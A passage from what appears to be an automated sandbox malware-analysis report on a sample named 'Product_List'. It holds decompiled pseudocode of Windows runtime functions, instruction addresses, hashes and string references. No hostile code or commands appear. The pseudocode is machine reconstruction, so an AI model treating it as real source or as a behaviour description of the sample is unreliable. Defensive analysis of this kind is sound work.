								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01784620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                      0x01771b8f
                                                      0x01771b9a
                                                      0x01771b9c
                                                      0x01771b9e
                                                      0x01771ba3
                                                      0x017c7010
                                                      0x017c7010
                                                      0x00000000
                                                      0x01771ba9
                                                      0x01771ba9
                                                      0x01771bae
                                                      0x00000000
                                                      0x01771bc5
                                                      0x01771bca
                                                      0x01771bcf
                                                      0x01771bd0
                                                      0x01771bd1
                                                      0x01771bd2
                                                      0x01771bd6
                                                      0x01771bdc
                                                      0x01771be0
                                                      0x017c6ffc
                                                      0x017c7000
                                                      0x00000000
                                                      0x017c7006
                                                      0x017c7009
                                                      0x017c7009
                                                      0x01771be6
                                                      0x01771bec
                                                      0x01771c0b
                                                      0x01771c0b
                                                      0x01771c0c
                                                      0x01771c11
                                                      0x01771c12
                                                      0x01771c15
                                                      0x01771c1b
                                                      0x01771c1f
                                                      0x01771c31
                                                      0x01771c33
                                                      0x017c7026
                                                      0x017c7026
                                                      0x01771c21
                                                      0x01771c24
                                                      0x01771c24
                                                      0x01771bee
                                                      0x01771bee
                                                      0x01771bf2
                                                      0x01771c3a
                                                      0x01771bf4
                                                      0x01771bf4
                                                      0x01771c05
                                                      0x01771c05
                                                      0x01771c09
                                                      0x01771c3e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01771c09
                                                      0x01771bec
                                                      0x01771be0
                                                      0x01771bae
                                                      0x01771c2e

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: WindowsExcludedProcs
                                                      • API String ID: 0-3583428290
                                                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                      • Instruction ID: cc5bb6b905d5901de9365bde25a7b1078bdf1687eae5b555581af19dff055631
                                                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                      • Instruction Fuzzy Hash: 6B210E77501229ABDF229E99C844F6BFBADEF81B50F454469FE04DB204DA30DD00DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01818DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E01818DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1840d50);
				E017BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					L017F5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L017BDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L017BDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E017BD130(_t34, _t39, _t40);
			}





                                                      0x01818df1
                                                      0x01818df1
                                                      0x01818df1
                                                      0x01818df1
                                                      0x01818df1
                                                      0x01818df1
                                                      0x01818df3
                                                      0x01818df8
                                                      0x01818dfd
                                                      0x01818e00
                                                      0x01818e0e
                                                      0x01818e2a
                                                      0x01818e36
                                                      0x01818e38
                                                      0x01818e3c
                                                      0x01818e46
                                                      0x01818e46
                                                      0x01818e36
                                                      0x01818e50
                                                      0x01818e56
                                                      0x01818e59
                                                      0x01818e5c
                                                      0x01818e60
                                                      0x01818e67
                                                      0x01818e6d
                                                      0x01818e73
                                                      0x01818e74
                                                      0x01818eb1
                                                      0x01818ebd

                                                      Strings
                                                      • Critical error detected %lx, xrefs: 01818E21
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Critical error detected %lx
                                                      • API String ID: 0-802127002
                                                      • Opcode ID: c4c3f85892d9bf4cbdb741ffcafbc640377cbc0bdf43ef8a23c27f288c72c943
                                                      • Instruction ID: f7778787d77efb50f31a6ea71a20bc56c1f08ecaedac5141a7a78469bd118572
                                                      • Opcode Fuzzy Hash: c4c3f85892d9bf4cbdb741ffcafbc640377cbc0bdf43ef8a23c27f288c72c943
                                                      • Instruction Fuzzy Hash: 6F117972D04348DBDB24CFA8C54A7DDFBB4AB05318F20422DE568AB386C3740602CF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01835BA5 Relevance: .6, Instructions: 592COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 88%
                                                      			E01835BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1841178);
				E017BD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = L01834C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E017AD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01835542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x18560e8;
								if( *0x18560e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x18560e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E017A9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E017A6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E017AF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E017AF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E017AF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E017AFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E017AFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E017AF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E017AF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01834CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E017BD130(_t427, _t494, _t511);
				}
			}










































































                                                      0x01835ba5
                                                      0x01835baa
                                                      0x01835baf
                                                      0x01835bb4
                                                      0x01835bb6
                                                      0x01835bbc
                                                      0x01835bbe
                                                      0x01835bc4
                                                      0x01835bcd
                                                      0x01835bd3
                                                      0x01835bd6
                                                      0x01835bdc
                                                      0x01835be0
                                                      0x01835be3
                                                      0x01835beb
                                                      0x01835bf2
                                                      0x01835bf8
                                                      0x01835bfe
                                                      0x01835c04
                                                      0x01835c0e
                                                      0x01835c18
                                                      0x01835c1f
                                                      0x01835c25
                                                      0x01835c2a
                                                      0x01835c2c
                                                      0x01835c32
                                                      0x01835c3a
                                                      0x01835c3f
                                                      0x01835c42
                                                      0x01835c48
                                                      0x01835c5b
                                                      0x01835c5b
                                                      0x01835c2c
                                                      0x01835cb7
                                                      0x01835cb9
                                                      0x01835cbf
                                                      0x01835cc2
                                                      0x01835cca
                                                      0x01835ccb
                                                      0x01835ccb
                                                      0x01835cd1
                                                      0x01835cd7
                                                      0x01835cda
                                                      0x01835ce1
                                                      0x01835ce4
                                                      0x01835ce7
                                                      0x01835ced
                                                      0x01835cf3
                                                      0x01835cf9
                                                      0x01835cff
                                                      0x01835d08
                                                      0x01835d0a
                                                      0x01835d0e
                                                      0x01835d10
                                                      0x00000000
                                                      0x00000000
                                                      0x01835d16
                                                      0x01835d1a
                                                      0x00000000
                                                      0x00000000
                                                      0x01835d20
                                                      0x01835d22
                                                      0x01835d25
                                                      0x01835d2f
                                                      0x01835d2f
                                                      0x01835d33
                                                      0x01835d3d
                                                      0x01835d49
                                                      0x01835d4b
                                                      0x00000000
                                                      0x00000000
                                                      0x01835d5a
                                                      0x01835d5d
                                                      0x01835d60
                                                      0x00000000
                                                      0x00000000
                                                      0x01835d66
                                                      0x01835d69
                                                      0x00000000
                                                      0x00000000
                                                      0x01835d6f
                                                      0x01835d6f
                                                      0x01835d73
                                                      0x01835d79
                                                      0x01835d7f
                                                      0x01835d86
                                                      0x01835d95
                                                      0x01835d98
                                                      0x01835dba
                                                      0x01835dcb
                                                      0x01835dce
                                                      0x01835dd3
                                                      0x01835dd6
                                                      0x01835dd8
                                                      0x01835de6
                                                      0x01835dec
                                                      0x01835dee
                                                      0x01835df1
                                                      0x01835df3
                                                      0x0183635a
                                                      0x0183635a
                                                      0x00000000
                                                      0x0183635a
                                                      0x01835dfe
                                                      0x01835e02
                                                      0x01835e05
                                                      0x01835e07
                                                      0x01835e10
                                                      0x01835e13
                                                      0x01835e1b
                                                      0x01835e1c
                                                      0x01835e21
                                                      0x01835e22
                                                      0x01835e23
                                                      0x01835e25
                                                      0x01835e2a
                                                      0x01835e2c
                                                      0x01835e2e
                                                      0x01835e36
                                                      0x01835e39
                                                      0x01835e42
                                                      0x01835e47
                                                      0x01835e4d
                                                      0x01835e54
                                                      0x01835e54
                                                      0x01835e54
                                                      0x01835e2e
                                                      0x01835e5c
                                                      0x01835e5f
                                                      0x01835e62
                                                      0x01835e64
                                                      0x01835e6b
                                                      0x01835e70
                                                      0x01835e7a
                                                      0x01835e7a
                                                      0x01835e7a
                                                      0x01835e6b
                                                      0x01835e7e
                                                      0x01835e7f
                                                      0x01835e7f
                                                      0x01835e81
                                                      0x01835e87
                                                      0x01835e8b
                                                      0x01835e8c
                                                      0x01835e8c
                                                      0x01835e8c
                                                      0x01835e9a
                                                      0x01835e9c
                                                      0x01835ea2
                                                      0x01835ea6
                                                      0x01835f50
                                                      0x01835f50
                                                      0x01835f57
                                                      0x01835f66
                                                      0x01835f66
                                                      0x01835f66
                                                      0x01835f68
                                                      0x01835f6a
                                                      0x018363d0
                                                      0x00000000
                                                      0x01835f70
                                                      0x01835f70
                                                      0x01835f91
                                                      0x01835f9c
                                                      0x01835f9e
                                                      0x01835fa4
                                                      0x01835fa6
                                                      0x0183638c
                                                      0x01836392
                                                      0x018363a1
                                                      0x018363a7
                                                      0x018363af
                                                      0x018363af
                                                      0x018363bd
                                                      0x018363d8
                                                      0x00000000
                                                      0x018363d8
                                                      0x01835fac
                                                      0x01835fb2
                                                      0x01835fb4
                                                      0x01835fbd
                                                      0x01835fc6
